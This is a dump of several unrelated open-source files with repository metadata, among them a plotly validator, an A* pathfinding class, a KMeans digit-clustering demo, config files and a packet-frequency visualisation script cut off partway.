EDA_data_label('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1],
'data/data_0930_merge_2/data_unmerge/test/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
test.to_csv('data/data_0930_merge_2/data_unmerge/train/' + path_file.split('/')[-1], index=False)
EDA_data_label('data/data_0930_merge_2/data_unmerge/train/' + path_file.split('/')[-1],
'data/data_0930_merge_2/data_unmerge/train/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
# split_train_test_data('data/data_0930_merge_2/')
| [
"hangnt@datascience.com.vn"
] | hangnt@datascience.com.vn |
d60e972614e566bef7cbc20eb726db3227df9346 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/pointcloud/_y.py | dfc46fe42092562d7111c7b05c2ec21d2a386694 | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 400 | py | import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name='y', parent_name='pointcloud', **kwargs):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc+clearAxisTypes',
role='data',
**kwargs
)
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
1d82ced55124252a9363b7798cf2e4dd21ad0dfe | c9b9d81a0f6c68afefd093a18a14bcfcb95cdba6 | /master.py | dbde6b4d1f107d5af1fadc253aeb5affb9681ee3 | [] | no_license | loicpillard/Master | 6b43523a43acc251fcc23d1b7c80f9e952affc07 | 78012dc96da69bf2224648eed55bc8b4e2cdae47 | refs/heads/master | 2020-12-15T09:31:45.508211 | 2016-10-07T08:47:34 | 2016-10-07T08:47:34 | 43,424,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,823 | py | #!/usr/bin/python
L = ["E", "G0", "G1", "G2", "G3", "G4", "G4bis", "O", "R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9", "SE", "SG0",
"SG1", "SG2", "SG3", "SG4", "SG4bis", "SO", "SR1", "SR2", "SR3", "SR4", "SR5", "SR6", "SR7", "SR8", "SR9"]
import stats
#for element in L:
#i = 1
#while i < 101:
#stats.fst_nbA(element+"/stats_"+element+"-"+str(i)+".txt", element+"/astar4_distances_pairwise_"+element+".txt",
#element+"/astar4_distances_from_AA_"+element+".txt", element+"/coordinates_"+element+".txt",
#element+"/fst_"+element+"-"+str(i)+".txt", element+"/nbA_"+element+"-"+str(i)+".txt")
#i += 1
#for element in L:
#i = 1
#while i < 101:
#stats.cluster_nbK(element+"/kmeans_ind_"+element+"-"+str(i)+".txt", element+"/kmeans_nbK_"+element+".txt")
#stats.cluster_continent(element+"/kmeans_ind_"+element+"-"+str(i)+".txt",
# element+"/kmeans_continent_"+element+".txt")
#stats.cluster_good(element+"/kmeans_ind_"+element+"-"+str(i)+".txt",
#element+"/kmeans_goodcluster_"+element+"-"+str(i)+".txt")
#i += 1
#stats.cluster_good_summary(element+"/kmeans_goodcluster_"+element,
#element+"/kmeans_goodcluster_summary_"+element+".txt")
#for element in L:
#stats.cluster_individuals_continent(element+"/kmeans_ind_"+element, element+"/kmeans_goodcluster_"+element,
#element+"/kmeans_continent_individuals_"+element+".txt")
#for element in L:
#i = 1
#while i < 101:
#stats.admixture(element+"/structure_"+element+"-"+str(i)+".txt", element+"/admixture"+element+"-"+str(i))
#i += 1
#for element in L:
#j = 1
#while j < 101:
#i = 1
#while i < 11:
#stats.admixture_rearrangement("populations/populations_"+element+".txt",
#element+"/admixture_"+element+"-"+str(j)+"."+str(i)+".Q",
#element+"/admixture_"+element+"-"+str(j)+"."+str(i)+".txt")
#i += 1
#j += 1
#for element in L:
#stats.admixture_bestK("admixtureK_"+element+".txt", "admixture_bestK_"+element+".txt", 10)
for element in L:
stats.procrustes_summary(element+"/procrustes_"+element, element+"/procrustes_summary_angle_"+element+".txt",
element+"/procrustes_summary_score_"+element+".txt")
#for element in L:
#stats.admixture_rearrangement("populations/populations_"+element+".txt",
#"kmeans_continent_individuals_"+element+".txt",
#"continent_individuals_"+element+".txt")
| [
"noreply@github.com"
] | loicpillard.noreply@github.com |
9f5938acd7bba762554269603c8837ab1e2e3158 | fbcc343b89fa01a1252528968f6b56f0254f831f | /ylpa/linprog_examples/ex04_reference_corner_plate_lowest_reinf.py | 011acdcc01e631c2f37ca95d8ab510d7de6d05c3 | [] | no_license | Vancikv/YLPA | 15b2cfdc9e21dad8f618aef63c46c7d4870ca19a | a53567782dd7b3eda2131dae62965c0859f2cde0 | refs/heads/master | 2021-01-10T15:19:25.370090 | 2016-01-18T19:13:08 | 2016-01-18T19:13:08 | 49,895,504 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,909 | py | '''
Created on 2. 6. 2015
@author: Kapsak
'''
from ylpa import \
Plate, Node, PlateSegment, \
ParametricStudy, YieldLine, Parameter, \
ParamNode, ParamPlate, PlateLoadUniform, \
Reinforcement, YLPATreeView
import numpy as np
b = 3.
a = 2.
n1 = Node(x=0., y=0., w=0.)
n2 = Node(x=2 * b, y=0., w=0.)
n3 = Node(x=2 * b, y=2 * a, w=0.)
n4 = Node(x=b, y=2 * a)
n5 = Node(x=0., y=2 * a)
n6 = Node(x=0., y=a)
sg1 = PlateSegment(node_nos=[1, 2, 3, 4, 6])
sg2 = PlateSegment(node_nos=[4, 5, 6])
yl = [YieldLine(6, 4)]
reinforcement = [Reinforcement(p1=0.01, p2=0.01,
p1u=0.01, p2u=0.01,
node_name='reinforcement')]
plate = Plate(nodes=[n1, n2, n3, n4, n5, n6],
segments=[sg1, sg2],
yield_lines=yl,
plastic_moment_def_type="ortho_reinf_dep",
load=[PlateLoadUniform()],
reinforcement=reinforcement,
h=0.2,
)
pstudy = ParametricStudy(plate=plate,
node_params=[Parameter(base_value=b, minimum=0.01, maximum=2 * b - 0.01),
Parameter(base_value=a, minimum=0.01, maximum=2 * a - 0.01),
],
param_nodes=[ParamNode(node_no=4, trait_name="x", param_no=1, multiplier=1., base_value=0.),
ParamNode(node_no=6, trait_name="y", param_no=2, multiplier=1., base_value=0.)],
)
# print plate.unit_work_ratio
# print pstudy.min_work_ratio
# reinforcement[0].p1u = 0.005
# reinforcement[0].p2u = 0.005
# print pstudy.min_work_ratio
# reinforcement[0].p1u = 0.002
# reinforcement[0].p2u = 0.002
# print pstudy.min_work_ratio
view = YLPATreeView(root=pstudy)
view.configure_traits()
| [
"vla.vancik@gmail.com"
] | vla.vancik@gmail.com |
2528dacb9b7faf1b27138b6f716d590ff2de4129 | 2774cd543667e48ad2f44539ff77bac2e84265ef | /plugins/IonVariableSD.py | b038971651bb2387ca93587bb50a018aac59409b | [] | no_license | ecell/ecell3-model-editor | 279fbe6797224ad319caa66731309923aed4cee5 | 02fcbb7085bd1410dcafcfb980c5ad138795a724 | refs/heads/master | 2021-01-19T06:40:17.464207 | 2008-02-27T09:25:44 | 2008-02-27T09:25:44 | 1,831,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,637 | py | #::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#
# This file is part of the E-Cell System
#
# Copyright (C) 1996-2007 Keio University
# Copyright (C) 2005-2007 The Molecular Sciences Institute
#
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#
#
# E-Cell System is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# E-Cell System is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with E-Cell System -- see the file COPYING.
# If not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
#END_HEADER
import numpy as nu
import ecell.ecs_constants as consts
from ecell.ui.model_editor.Constants import *
from ecell.ui.model_editor.ShapeDescriptor import *
SHAPE_PLUGIN_TYPE = OB_TYPE_VARIABLE #Shape Plugin Constants
SHAPE_PLUGIN_NAME = 'Ion'
OS_SHOW_LABEL=1
def estLabelDims(graphUtils, aLabel):
(tx_height, tx_width) = graphUtils.getTextDimensions(aLabel )
return tx_width+6, tx_height + 6
class IonVariableSD( ShapeDescriptor):
def __init__( self, parentObject, graphUtils, aLabel ):
ShapeDescriptor.__init__( self, parentObject, graphUtils, aLabel )
self.thePointMatrix = nu.array([ [[1,0,0,0,0],[1,0,0,0,0]],[[1,0,4,4,1],[1,0,15,15,1]],[[1,0,4,2,0],[1,0,10,5,0]],[[1,0,4,1.25,0.5],[1,-0.65,0,1.25,0.65]],[[1,0,0,5,0.5],[1,0.25,1,-0.5,-0.15]],[[1,0,4,1.25,0.5],[1,0.45,0,1.25,3.15]],[[1,0,0,5,0.5],[1,1.05,1,0.5,2.65]],[[1,0,1,0.5,0],[1,1,-0.5,1,-0.15]],[[1,0,2,-2,0],[1,-0.1,0.25,9,0.75]],[[1,0,4,5,1],[1,1,-0.5,1,-0.15]],[[1,0,4,2.5,1],[1,-0.1,0.25,9,0.75]]])
self.theCodeMap = {\
# 'frame' : [0,1],
'text' : [2],
RING_TOP : [3,4],
RING_BOTTOM : [5,6],
RING_LEFT : [7,8],
RING_RIGHT : [9,10],
"image" : [5],
"image2" : [9]
}
self.theDescriptorList = {\
#NAME, TYPE, FUNCTION, COLOR, Z, SPECIFIC, PROPERTIES
# 'frame' : ['frame', CV_ELL, SD_FILL, SD_FILL, 7, [ [], 1 ] ],
"image" : ["image",CV_IMG, SD_FILL, SD_FILL, 3, [ [], "IonVariableSD.png" ] ],\
"image2" : ["image2",CV_IMG, SD_FILL, SD_FILL, 3, [ [], "IonVariableSD.png" ] ],\
'text' : ['text', CV_TEXT, SD_FILL, SD_TEXT, 5, [ [], aLabel ] ],\
RING_TOP : [RING_TOP, CV_RECT, SD_RING, SD_OUTLINE, 3, [ [],0 ] ],\
RING_BOTTOM : [RING_BOTTOM, CV_RECT, SD_RING, SD_OUTLINE, 3, [ [], 0] ],\
RING_LEFT : [RING_LEFT,CV_RECT, SD_RING, SD_OUTLINE, 3, [ [], 0] ],\
RING_RIGHT : [RING_RIGHT, CV_RECT, SD_RING, SD_OUTLINE, 5, [ [], 0] ]}
self.reCalculate()
def estLabelWidth(self, aLabel):
(tx_height, tx_width) = self.theGraphUtils.getTextDimensions( aLabel )
return tx_width + self.olw*2
def getRequiredWidth( self ):
self.calculateParams()
return self.tx_width + self.olw*2
def getRequiredHeight( self ):
self.calculateParams()
return self.tx_height+ self.olw*4
def getRingSize( self ):
return self.olw*2
| [
"moriyoshi@f1531174-cb10-0410-9fe6-89aa7ac3eedb"
] | moriyoshi@f1531174-cb10-0410-9fe6-89aa7ac3eedb |
7a218a01ecbfc594cc00ff334d30ebe2489e5c13 | c324a6d923bae3a00bd1dc69a43d0e5c707a104a | /addons-vauxoo/hr_expense_replenishment/__openerp__.py | f75805678aedf47bc322db43b9213897c5e35bdc | [] | no_license | meswapnilwagh/odoo-adr | 5c593c2240d23b79811ccd7b5297b634e5ffe19d | 442c8d5fa52cab30028a26dd93bd8eae88d58fed | refs/heads/master | 2020-01-27T10:03:27.142715 | 2015-09-04T14:36:59 | 2015-09-04T14:36:59 | 50,238,226 | 0 | 4 | null | 2016-01-23T12:53:28 | 2016-01-23T12:53:25 | null | UTF-8 | Python | false | false | 2,537 | py | # -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
############# Credits #########################################################
# Coded by: Katherine Zaoral <kathy@vauxoo.com>
# Planified by: Humberto Arocha <hbto@vauxoo.com>
# Audited by: Humberto Arocha <hbto@vauxoo.com>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
{
"name": "Expenses Replenishment",
"version": "0.1",
"author": "Vauxoo",
"category": "HR Module",
"description": """
Expenses Replenishment
======================
This module add the functionality to the HR Expense module to manage deductible
expenses by using invoices asociated to an expense document. Also make an
automation of the reconciliation process for the expense and the employee
payment.
Dependencies information
------------------------
- You can download the *account_invoice_line_currency* module from::
bzr branch lp:addons-vauxoo/7.0
""",
"website": "http://openerp.com.ve",
"license": "",
"depends": [
"hr_expense",
"account_invoice_line_currency",
"hr_expense_analytic",
"account_move_report"
],
"demo": [],
"data": [
"security/hr_security.xml",
"wizard/hr_expense_wizard_view.xml",
"view/account_invoice_view.xml",
"view/hr_expense_view.xml",
"workflow/workflow.xml"
],
"test": [],
"js": [],
"css": [],
"qweb": [],
"installable": True,
"auto_install": False,
"active": False
} | [
"tecnologia@obsdr.com"
] | tecnologia@obsdr.com |
eed553fcbac8ff8f4d3035a692503463afc204bc | b27543728fe3de41b2ba7666b2ec8ee4c378f6f8 | /users/migrations/0002_alter_profile_image.py | 6c7caa50a16435370e095b5370b224f144f7703f | [] | no_license | jasonantao/image_repository | 2fddd5dbee366dbb8e5204d2a73ee4d1a9c6566a | c8b2426a793d182763f6f8a33ee473a786363879 | refs/heads/master | 2023-07-12T06:27:18.141249 | 2021-08-14T13:43:42 | 2021-08-14T13:43:42 | 365,867,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # Generated by Django 3.2.2 on 2021-05-09 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.ImageField(default='default_1.jpg', upload_to='profile_pics'),
),
]
| [
"jasantao99@gmail.com"
] | jasantao99@gmail.com |
c313302f1063157d58dec8f1c153c548cd3ba447 | baf024d5b45a229b54c906f3f187bd7b655e3c8f | /eat.py | c2efd494839edddad58152df9225d729d8c62c17 | [] | no_license | breathingM/pomelo | f9e7a206aeed80fe5dd4faf7c5456cc20e1829f8 | 5d966a7b150078e57713597ee8af830269b88854 | refs/heads/master | 2021-01-15T08:58:33.803047 | 2015-11-03T04:02:45 | 2015-11-03T04:02:45 | 45,440,487 | 1 | 0 | null | 2015-11-03T03:55:41 | 2015-11-03T03:55:41 | null | UTF-8 | Python | false | false | 1,216 | py | #!/usr/bin/env python
import sys
import getopt
import pomelo
def usage():
print "Usage:%s [-h] [--help|--run|--renew|--off|--update|--del|--nginx|--clear] args..." % (sys.argv[0])
sys.exit(0)
if "__main__" == __name__:
obj = pomelo.Pomelo()
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "run", "renew", "off=", "roll", "del=", "nginx", "update", "clear"]);
except getopt.GetoptError as err:
print str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("--run"):
obj.create_container()
elif o in ("--renew"):
obj.renew_nginx_setting()
elif o in ("--off"):
fpmIds = [a]
for i in args:
fpmIds.append(i)
obj.offline_fpm(fpmIds)
elif o in ("--update"):
obj.rolling_update()
elif o in ("--del"):
fpmIds = [a]
for i in args:
fpmIds.append(i)
obj.delete_container(fpmIds)
elif o in ("--nginx"):
obj.run_nginx_container()
elif o in ("--clear"):
obj.clear_old_container()
sys.exit(0)
| [
"jingfu99@gmail.com"
] | jingfu99@gmail.com |
046ca5f5acec77e43d50ee66cec87798ea1834ca | 2242a9eded33d7cf1b62ede1e9ab4c2f17e95bb5 | /June-LeetCode-Challenge/Maximum Units on a Truck/maxUnits.py | 31221300b8468261cc31a7a22fb867be1c24f376 | [] | no_license | RiyaThakore/Python-Programs | 8b5a316c58a779f1a14fa363e79871831b086202 | 399e8307196599027f0c412666987b33c89f7ac6 | refs/heads/main | 2023-08-29T05:48:02.447338 | 2021-11-01T02:27:45 | 2021-11-01T02:27:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | class Solution(object):
def maximumUnits(self, boxTypes, truckSize):
boxTypes.sort(key = lambda x: x[1])
output,box=0,0
for i in range(len(boxTypes)-1,-1,-1):
box+=boxTypes[i][0]
if box < truckSize:
output+=(boxTypes[i][0]*boxTypes[i][1])
else:
output+=((truckSize-(box-boxTypes[i][0]))*boxTypes[i][1])
return (output)
break
return (output)
| [
"noreply@github.com"
] | RiyaThakore.noreply@github.com |
2938b2104b3f37ffe030d79ac4eb792d5a521b37 | 11d021d531b9fec3fa782131e89233c8d2e3169d | /sokoban-python/Pathfind_Algorithms2.py | 85c63b85f06ef6912195da326adc24da9a8577ee | [] | no_license | atopion/sokoban | a2992eeaf49a1fbdede6630992696dcdf05cfd89 | bfab7b0f4fc1f18b15b14333c1ddbd9621fbecc2 | refs/heads/master | 2020-04-15T18:52:00.996313 | 2019-04-14T19:44:12 | 2019-04-14T19:44:12 | 164,928,759 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | import Metrics
import Map
class Pathfind_Algorithms:
def __init__(self, map):
self.width = map.width
self.cleared_map = map.getClearedMap().copy()
for i in range(len(self.cleared_map)):
self.cleared_map[i] = Node(self.cleared_map[i], i)
def children(self, point, box_array):
links = [self.cleared_map[d].copy() for d in
[point.point - 1, point.point + 1, point.point - self.width, point.point + self.width]]
links = [l for l in links if l.point not in box_array]
return [link for link in links if link.value % 2 != 0]
#def manhattan(self, point, point2):
# return abs(point.point % self.width - point2.point % self.width) + abs(
# point.point // self.width - point2.point // self.width)
def A_sternchen(self, start1, goal1, box_array):
# start = Node(self.cleared_map[start], start)
# goal = Node(self.cleared_map[goal], goal)
start = self.cleared_map[start1]
goal = self.cleared_map[goal1]
# The open and closed sets
openset = set()
closedset = set()
# Current point is the starting point
current = start
# Add the starting point to the open set
openset.add(current)
# While the open set is not empty
while openset:
# Find the item in the open set with the lowest G + H score
current = min(openset, key=lambda o: o.G + o.H)
# If it is the item we want, retrace the path and return it
if current.point == goal1:
path = []
while current.parent:
path.append(current)
current = current.parent
path.append(current)
return path[::-1]
# Remove the item from the open set
openset.remove(current)
# Add it to the closed set
closedset.add(current)
# Loop through the node's children/siblings
for node in self.children(current, box_array):
# If it is already in the closed set, skip it
if node in closedset:
continue
# Otherwise if it is already in the open set
if node in openset:
# Check if we beat the G score
new_g = current.G + current.move_cost()
if node.G > new_g:
# If so, update the node to have a new parent
node.G = new_g
node.parent = current
else:
continue
else:
# If it isn't in the open set, calculate the G and H score for the node
node.G = current.G + current.move_cost()
node.H = Metrics.Metrics.manhattan_distance(node.point, goal.point, self.width) #.manhattan(node, goal)
# Set the parent to our current item
node.parent = current
# Add it to the set
openset.add(node)
# Throw an exception if there is no path
raise ValueError('No Path Found')
class Node:
def __init__(self, value, point):
self.value = value
self.point = point
self.parent = None
self.H = 0
self.G = 0
def move_cost(self):
return 1
def __str__(self):
return str(self.point)
def __repr__(self):
return self.__str__()
def copy(self):
return Node(self.value, self.point)
| [
"atopion@outlook.com"
] | atopion@outlook.com |
f2604b7d0735b32b57e274d09c579d5ddc0b046c | 1d4c8db10e0965b60f398d5ab907c0516753c853 | /handwriting_unsupervised_AI.py | 59b6073b6417445ed6185a5eeacaa30febb2b71f | [] | no_license | mattielangford/handwriting_unsupervised | 1c02535979bc120c663a839a7a155ecae7feaf49 | 5c30632e862fd4958b7c77ece7d2b16370307f74 | refs/heads/master | 2020-05-26T16:07:29.381456 | 2019-05-23T20:01:29 | 2019-05-23T20:01:29 | 188,298,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,767 | py | import codecademylib3_seaborn
import numpy as np
from matplotlib import pyplot as plt
from sklearn import datasets
from sklearn.cluster import KMeans
#From a total of 43 people, 30 contributed to the training set and different 13 to the test set.
digits = datasets.load_digits()
print(digits.data)
print(digits.target)
#plt.gray()
#plt.matshow(digits.images[100])
#plt.show()
#print(digits.target[100])
model = KMeans(n_clusters = 10, random_state = 42)
model.fit(digits.data)
fig = plt.figure(figsize=(8, 3))
fig.suptitle("Cluser Center Images", fontsize=14, fontweight='bold')
for i in range(10):
# Initialize subplots in a grid of 2X5, at i+1th position
ax = fig.add_subplot(2, 5, 1 + i)
# Display images
ax.imshow(model.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)
plt.show()
new_samples = np.array([
[0.00,0.00,0.00,3.02,7.53,4.33,2.73,0.00,0.00,0.00,0.97,7.38,5.77,5.92,7.07,0.29,0.00,0.23,5.93,7.39,1.20,3.40,7.62,2.73,0.00,4.77,7.62,2.65,0.75,2.11,7.62,4.27,2.64,7.61,7.44,7.30,7.60,7.60,7.62,5.56,2.57,6.09,5.78,4.47,2.74,2.12,4.95,6.78,0.00,0.00,0.00,0.00,0.00,0.00,3.42,7.62,0.00,0.00,0.00,0.00,0.00,0.00,2.19,7.62],
[0.00,0.00,1.43,2.28,2.28,0.45,0.00,0.00,1.13,5.91,7.60,7.61,7.62,6.01,0.22,0.00,3.72,7.61,3.55,1.06,2.73,7.62,2.43,0.00,0.45,1.82,0.00,0.00,0.07,7.62,3.05,0.00,0.75,4.25,5.33,4.63,2.04,7.62,2.97,0.00,4.48,7.52,5.85,7.45,7.62,6.93,0.67,0.00,3.94,7.53,4.71,7.54,7.53,7.53,4.85,1.06,0.60,6.39,6.85,4.93,0.90,4.53,7.54,3.35],
[0.00,0.00,0.60,2.12,2.28,2.96,0.22,0.00,0.00,3.33,7.54,7.61,7.61,7.61,1.29,0.00,0.60,7.45,5.54,1.88,3.33,7.62,0.76,0.00,1.52,7.62,2.20,0.00,6.14,6.92,0.15,0.00,0.60,7.07,7.30,6.08,7.62,3.63,0.00,0.00,0.00,1.21,5.47,7.62,7.61,6.99,0.37,0.00,0.00,0.07,6.38,6.77,3.41,7.62,0.76,0.00,0.00,1.51,7.61,6.75,6.63,7.54,0.53,0.00],
[0.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,2.88,5.34,5.33,5.33,5.10,0.30,0.00,1.51,7.62,6.16,5.33,6.53,7.62,0.75,0.00,2.28,7.62,4.64,4.26,7.14,7.62,0.76,0.00,0.59,5.77,6.86,6.85,6.39,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00]
])
new_labels = model.predict(new_samples)
print(new_labels)
#map out each of the labels with the digits we think it represents
for i in range(len(new_labels)):
if new_labels[i] == 0:
print(0, end='')
elif new_labels[i] == 1:
print(9, end='')
elif new_labels[i] == 2:
print(2, end='')
elif new_labels[i] == 3:
print(1, end='')
elif new_labels[i] == 4:
print(6, end='')
elif new_labels[i] == 5:
print(8, end='')
elif new_labels[i] == 6:
print(4, end='')
elif new_labels[i] == 7:
print(5, end='')
elif new_labels[i] == 8:
print(7, end='')
elif new_labels[i] == 9:
print(3, end='') | [
"noreply@github.com"
] | mattielangford.noreply@github.com |
6eeb4dc855546f60cc8bafdb28339212ab8eb907 | b37b514233094763d124f287acb3a833834108f0 | /Pattern.py | 6af2685ed1e2fa748881f5e4f96428eceb21de39 | [] | no_license | gorillacodes/HelloWorld- | 53c334c83b73a16efcc53178ba6ce71246ef87fd | bd34fb0e5410368e11691634f2a5026957e5965a | refs/heads/main | 2023-03-30T22:41:17.162244 | 2021-03-25T19:27:14 | 2021-03-25T19:27:14 | 328,973,633 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | n = int(input("Enter no. of rows: "))
for i in range (1,n+1):
for x in range (1,i+1):
print ("*", end = "")
print()
| [
"noreply@github.com"
] | gorillacodes.noreply@github.com |
4f5852459dd41126a6aadfebbcaa51b7355f19b2 | 16810cd83941d7d900c39420fc2ea912e38d6159 | /finalP/wsgi.py | db54015cdcda7566853984faba981536fe732eb7 | [
"MIT"
] | permissive | danielskiptoo/foreCast | 737f830cef0e2e3cd6a37ddb05f47da67bd3b966 | f2946b613ae174144716eefdfc0654ccbf7a9b27 | refs/heads/master | 2023-04-15T09:17:28.107693 | 2023-04-03T10:37:16 | 2023-04-03T10:37:16 | 127,606,366 | 0 | 0 | MIT | 2022-12-08T00:57:24 | 2018-04-01T07:13:35 | JavaScript | UTF-8 | Python | false | false | 389 | py | """
WSGI config for finalP project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "finalP.settings")
application = get_wsgi_application()
| [
"kiptood6@gmail.com"
] | kiptood6@gmail.com |
2acd1397408b43bcf0280ad2d0d33cf4fc765b86 | eada63ec0ed309ef817e3a75603b199a91952b6d | /pythonProject/Locators/LocatorsDateSelectionScreen.py | 2f3fb7504068472191485d4aec648dfa1666cc83 | [] | no_license | DandresPer/appium_poc_booking | ffef39dbb28f69e2381cc160bfbfd1588fc30b39 | 2a3dc644fed4b553a06c2995b1d45e213d771dde | refs/heads/main | 2023-01-21T09:30:49.493056 | 2020-11-30T09:51:41 | 2020-11-30T09:51:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | import calendar
import datetime
from Locators.Locators import Locator
def generate_dates(time_between_dates):
now = datetime.datetime.now()
date_1 = f"{now.day:02d} " + calendar.month_name[now.month] + " " + str(now.year)
then = now + datetime.timedelta(days=time_between_dates)
date_2 = f"{then.day:02d} " + calendar.month_name[then.month] + " " + str(then.year)
return date_1, date_2
class LocatorsDateSelectionScreen(Locator):
calendar_view = "com.booking:id/bui_calendar_view"
confirm_button = "com.booking:id/calendar_confirm"
date_1, date_2 = generate_dates(15)
initial_date_android = '//android.view.View[@content-desc="' + date_1 + '"]'
end_date_android = '//android.view.View[@content-desc="' + date_2 + '"]'
| [
"danielanper@hotmail.com"
] | danielanper@hotmail.com |
a7088d8f59c39486be2953ab3e1975839fd8c83a | a27ec396d8ad24a5c93557249c55c61de2ba8f68 | /Visual_cir.py | 32528cde5eac4683008cc592dba3e931577ea8d6 | [] | no_license | sophieball/VisualNW | 28e9e77e3f4dc3b57abf2187a6f5b07d95e1eafd | 90431d8a39b9783a154e507f39ad762822804b1b | refs/heads/master | 2021-01-10T18:49:11.588122 | 2016-12-15T04:12:44 | 2016-12-15T04:12:44 | 58,431,591 | 0 | 0 | null | 2016-12-15T04:12:44 | 2016-05-10T05:13:15 | C | UTF-8 | Python | false | false | 5,742 | py | import graphics
from graphics import *
import re
import copy
vfile = open("freq", "r")
hasharr = [0]
srcs = []
dests = []
src_sqs = []
src_sqs_old = []
src_texts = []
src_texts_old = src_texts = []
src_freq = []
src_cur = []
src_last = []
dest_sqs = []
dest_sqs_old = []
dest_texts = []
dest_texts_old = []
dest_freq = []
dest_cur = []
dest_last = []
circles = []
circles_old = []
freqs = []
pos = [(100, 250), (200, 250), (300, 250), (400, 250), (500, 250), (600, 250), (700, 250), (800, 250), (900, 250), (1000, 250), (1100, 250), (1200, 250), (1300, 250),
(100, 500), (200, 500), (300, 500), (400, 500), (500, 500), (600, 500), (700, 500), (800, 500), (900, 500), (1000, 500), (1100, 500), (1200, 500), (1300, 500)]
pos_taken = [0] * 26
gap = 10
src_lines = []
src_lines_old = []
dest_lines = []
dest_lines_old = []
hfile = open("arrout", "r")
hline = hfile.readline()
while(len(hline) != 0):
if(hline not in hasharr):
hasharr.append(hline)
hline = hfile.readline()
hfile.close()
win = GraphWin("visual", 1400, 800, autoflush = False)
vline = vfile.readline()
while(len(vline) != 0):
while("ROOT" not in vline and len(vline) != 0):
vline = vfile.readline()
vline = vfile.readline()
src_freq = [0] * len(src_freq)
dest_freq = [0] * len(dest_freq)
src_last = copy.copy(src_cur)
src_cur = []
dest_last = copy.copy(dest_cur)
dest_cur = []
while("===" not in vline and len(vline) != 0):
i = int(vline.split(' ')[0])
ip = hasharr[i]
src = ip.split(' ')[0]
dest = ip.split(' ')[1]
dest = dest.split('\n')[0]
m = re.search('\((.|.+?)\)', vline)
print m.group(1)
if(int(m.group(1)) > 2):
if src in srcs:
src_freq[srcs.index(src)] = int(m.group(1))
else:
srcs.append(src)
src_freq.append(int(m.group(1)))
src_cur.append(srcs.index(src))
if dest in dests:
dest_freq[dests.index(dest)] = int(m.group(1))
else:
dests.append(dest)
dest_freq.append(int(m.group(1)))
dest_cur.append(dests.index(dest))
vline = vfile.readline()
#draw circles
for c in circles_old:
if c not in circles:
c.undraw()
center = c.getCenter()
pos_taken[pos.index((center.getX(), center.getY()))] = 0
for s in src_sqs_old:
if s not in src_sqs:
s.undraw()
for d in dest_sqs_old:
if d not in dest_sqs:
d.undraw()
for l in src_lines_old:
if l not in src_lines:
l.undraw()
for l in dest_lines_old:
if l not in dest_lines:
l.undraw()
for c in circles:
c.setFill("blue3")
c.setOutline("blue3")
for s in src_sqs:
s.setFill("purple3")
s.setOutline("purple3")
for d in dest_sqs:
d.setFill("purple3")
d.setOutline("purple3")
for l in src_lines:
l.setFill("grey")
l.setOutline("grey")
for l in dest_lines:
l.setFill("grey")
l.setOutline("grey")
circles_old = copy.copy(circles)
circles = []
src_sqs_old = copy.copy(src_sqs)
src_sqs = []
